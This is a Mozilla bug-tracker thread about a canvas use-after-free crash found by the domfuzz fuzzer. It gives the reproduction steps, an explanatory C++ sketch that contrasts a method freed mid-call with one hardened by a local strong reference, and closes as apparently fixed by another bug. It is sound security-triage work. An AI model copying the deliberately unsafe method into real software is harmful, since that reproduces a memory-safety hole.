Where do I get this extension and what is the code that's executed by fuzzPriv.callDrawWindow(0)?
Flags: needinfo?(mstange) → needinfo?(nils)
The code for the fuzzPriv extension can be found on this repo: https://github.com/MozillaSecurity/domfuzz/blob/master/dom/extension/content/fuzzPriv.js 
You can probably ping
I can't reproduce this in a current Nightly. This bug may have been fixed by bug 1371259. The symptoms certainly look like bug 1371259: The canvas is being freed while a call to a method on it is still on the stack.

Can you please check whether the bug still exists?

This bug was filed late in the evening on July 10 against 54 release.
Bug 1371259 was landed on central a few hours before that and was then backported to 55 and esr52.

Here's how I tried to reproduce it:
 1. I cloned the git repo https://github.com/MozillaSecurity/domfuzz
 2. I added <em:multiprocessCompatible>true</em:multiprocessCompatible> to /dom/extension/install.rdf
 3. I executed "make" in /dom/extension
 4. I created a new profile in Nightly and set xpinstall.signatures.required to false.
 5. I dragged the domFuzzLite3.xpi file that "make" generated into Nightly and installed the add-on.
 6. I loaded the testcase from a local file in an e10s tab.
 7. I allowed popups for that location.
 8. I reloaded the page.

It didn't crash. This was on Mac.
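As an added illustration (not Gecko code and not the fix from bug 1371259), the failure mode Markus describes, a refcounted object freed while one of its methods is still on the stack, next to the Gecko-style mitigation of holding a local strong reference across the re-entrant call. Canvas2D, RefPtr, g_live and the script hook are hypothetical stand-ins; the liveness set takes ASAN's place so the unsafe path reports the condition instead of reading freed memory.

```cpp
#include <cassert>
#include <cstdio>
#include <functional>
#include <set>
#include <vector>

// Liveness oracle standing in for ASAN: every live Canvas2D registers here.
static std::set<const void*> g_live;

// Minimal intrusive smart pointer in the spirit of Gecko's RefPtr (hypothetical).
template <class T>
class RefPtr {
  T* mPtr;
 public:
  explicit RefPtr(T* p) : mPtr(p) { if (mPtr) mPtr->AddRef(); }
  ~RefPtr() { reset(); }
  RefPtr(const RefPtr&) = delete;
  RefPtr& operator=(const RefPtr&) = delete;
  T* get() const { return mPtr; }
  // Drop the reference; the object is deleted if this was the last one.
  void reset() { T* p = mPtr; mPtr = nullptr; if (p) p->Release(); }
};

struct Canvas2D {
  enum Result { kOk, kUseAfterFree };

  int mRefCnt = 0;
  std::vector<int> mStyleStack{0};     // CurrentState() reads its length
  std::function<void()> mScriptHook;   // point where script, GC or CC may run

  Canvas2D() { g_live.insert(this); }
  ~Canvas2D() { g_live.erase(this); }
  void AddRef() { ++mRefCnt; }
  void Release() { if (--mRefCnt == 0) delete this; }

  // Vulnerable shape: nothing keeps `this` alive across the hook, so if the
  // caller's reference was the last one, `this` is freed before the state
  // stack is read. The oracle check stands in for the (undefined) read.
  Result DrawWindowUnsafe() {
    std::function<void()> hook = mScriptHook;   // copy: callable outlives a delete
    hook();
    if (!g_live.count(this)) return kUseAfterFree;   // ASAN would report here
    return mStyleStack.empty() ? kUseAfterFree : kOk;
  }

  // Hardened shape: a local strong reference (Gecko calls these
  // kungFuDeathGrip) pins `this` until the method returns.
  Result DrawWindowSafe() {
    RefPtr<Canvas2D> kungFuDeathGrip(this);
    std::function<void()> hook = mScriptHook;
    hook();
    assert(g_live.count(this));
    return mStyleStack.empty() ? kUseAfterFree : kOk;
  }
};

// Scenario: the DOM holds the only reference; the re-entrant hook drops it,
// modelling the cycle collector freeing the canvas mid-call.
static Canvas2D::Result RunScenario(bool hardened) {
  RefPtr<Canvas2D> owner(new Canvas2D);
  Canvas2D* raw = owner.get();
  raw->mScriptHook = [&owner] { owner.reset(); };
  return hardened ? raw->DrawWindowSafe() : raw->DrawWindowUnsafe();
}

int main() {
  std::printf("unsafe: %s\n",
              RunScenario(false) == Canvas2D::kUseAfterFree ? "use-after-free" : "ok");
  std::printf("safe:   %s\n",
              RunScenario(true) == Canvas2D::kOk ? "ok" : "use-after-free");
  std::printf("live objects remaining: %zu\n", g_live.size());
  return 0;
}
```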
I sent a message to the reporter to ask him if he was still able to reproduce it.
Apologies for missing this and thanks for your e-mail, Stephanie.

I tried to reproduce it on the latest stable release and can't reproduce it anymore.

Maybe this is related to another bug I reported which also stopped reproducing around the same time and which shows some similarities in the testcase. See https://bugzilla.mozilla.org/show_bug.cgi?id=1380292#c8
Flags: needinfo?(nils)
Thanks! Then I think this was fixed by bug 1371259.
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → WORKSFORME
Likewise esr52.
Whiteboard: [fixed by bug 1371259?]
Whiteboard: [fixed by bug 1371259?] → [fixed by bug 1371259?][adv-main56-]
Flags: sec-bounty? → sec-bounty-
Group: gfx-core-security
